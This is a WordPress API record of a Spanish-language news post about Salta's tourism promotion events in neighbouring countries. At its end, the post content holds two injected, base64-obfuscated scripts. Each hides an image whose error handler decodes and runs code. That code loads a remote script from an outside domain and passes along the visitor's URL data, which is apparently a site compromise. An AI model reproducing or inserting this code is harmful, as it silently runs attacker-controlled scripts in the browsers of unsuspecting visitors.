{"id":4258,"date":"2024-08-06T10:34:55","date_gmt":"2024-08-06T13:34:55","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4258"},"modified":"2025-08-13T23:51:32","modified_gmt":"2025-08-14T02:51:32","slug":"el-destino-salta-se-promociona-en-mercados-internacionales","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4258","title":{"rendered":"El destino Salta se promociona en mercados internacionales"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-47eb2d6c03a735fa161c198e2657aa7c\" style=\"background-color:#04517d\"><em>El equipo del Inprotur Salta realizar\u00e1 acciones de promoci\u00f3n y difusi\u00f3n en pa\u00edses vecinos, dirigidas al consumidor final y referentes del sector p\u00fablico y privado.<\/em><\/h3>\n\n\n\n<p>El Ministerio de Turismo y Deportes, a trav\u00e9s del equipo del Instituto de Promoci\u00f3n Tur\u00edstica de Salta (Inprotur Salta), tiene programado para los pr\u00f3ximos meses un calendario de acciones en mercados internacionales regionales en los pa\u00edses de Bolivia, Uruguay, Paraguay, Brasil y Chile.<\/p>\n\n\n\n<p>Esta agenda consta de una serie de acciones orientadas al consumidor final en puntos de gran afluencia de p\u00fablico, donde se brindar\u00e1 informaci\u00f3n y se realizar\u00e1n actividades para mostrar la amplia oferta de productos y servicios tur\u00edsticos que Salta ofrece a sus visitantes.<\/p>\n\n\n\n<p>En Bolivia, del 19 al 24 de septiembre, el equipo de promoci\u00f3n internacional estar\u00e1 presente en Santa Cruz con un espacio en el stand del Gobierno de Salta en el marco de la ExpoCruz, una de las ferias m\u00e1s importantes de la regi\u00f3n, donde podr\u00e1 mostrar la diversidad y riqueza tur\u00edstica de Salta a un p\u00fablico amplio y variado.<\/p>\n\n\n\n<p>El 3 de octubre, en Montevideo, Uruguay, se llevar\u00e1 a cabo un Workshop en el que participar\u00e1 el sector privado, que ofrecer\u00e1 una excelente oportunidad para establecer conexiones y promover el destino entre profesionales del sector.<\/p>\n\n\n\n<p>En Asunci\u00f3n, Paraguay, del 9 al 12 de octubre, en el marco de FITPAR, Salta realizar\u00e1 acciones en un centro comercial que incluir\u00e1n degustaciones, juegos y una amplia muestra de la oferta tur\u00edstica de la provincia. Adem\u00e1s, el 10 de octubre, Salta participar\u00e1 en el evento BUY ARGENTINA organizado por Inprotur Naci\u00f3n, junto a representantes del sector privado.<\/p>\n\n\n\n<p>Del 28 al 30 de noviembre, en Foz de Iguaz\u00fa, Brasil, se realizar\u00e1n acciones de promoci\u00f3n en un centro comercial, donde Salta contar\u00e1 con un stand para brindar informaci\u00f3n tur\u00edstica y actividades recreativas que incluir\u00e1 un stand de Salta donde se exhibir\u00e1 la variada oferta tur\u00edstica que la provincia tiene para ofrecer.<\/p>\n\n\n\n<p>El Ministro de Turismo y Deportes,&nbsp;<strong>Mario Pe\u00f1a<\/strong>, hizo referencia a estas acciones al indicar que \u201cnuestra objetivo es seguir posicionando a Salta como un destino tur\u00edstico de referencia en la regi\u00f3n, con actividades que nos permitan promocionar nuestra provincia e incentivar la afluencia de turistas para la temporada de verano y tambi\u00e9n fortalecer los v\u00ednculos con mercados regionales.\u201d<\/p>\n\n\n\n<p>Por su parte, la presidenta del INPROTUR, Manuela Arancibia, se\u00f1al\u00f3 estar \u201cmuy entusiasmada con este calendario de acciones, en el que cada evento fue planificado cuidadosamente para destacar lo mejor de Salta y conectar directamente con consumidores y profesionales del turismo. Es una gran oportunidad para mostrar todo lo que nuestra provincia tiene para ofrecer\u201d.<\/p>\n\n\n\n<p>Con estas acciones, Salta busca seguir consolid\u00e1ndose como un destino tur\u00edstico destacado en la regi\u00f3n, atrayendo a m\u00e1s visitantes y fortaleciendo los lazos con los mercados internacionales vecinos.<br>Para m\u00e1s informaci\u00f3n pueden comunicarse a&nbsp;<a href=\"https:\/\/www.salta.gob.ar\/inprotur@turismosalta.gov.ar.\">inprotur@turismosalta.gov.ar.<\/a><br>&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El equipo del Inprotur Salta realizar\u00e1 acciones de promoci\u00f3n y difusi\u00f3n en pa\u00edses vecinos, dirigidas al consumidor final y referentes del sector p\u00fablico y privado. El Ministerio de Turismo y Deportes, a trav\u00e9s del equipo del Instituto de Promoci\u00f3n Tur\u00edstica de Salta (Inprotur Salta), tiene programado para los pr\u00f3ximos meses un calendario de acciones en [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4259,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,22],"tags":[],"class_list":{"0":"post-4258","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-internacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4258"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4258"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4258\/revisions"}],"predecessor-version":[{"id":6723,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4258\/revisions\/6723"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4259"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4258"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4258"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4258"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}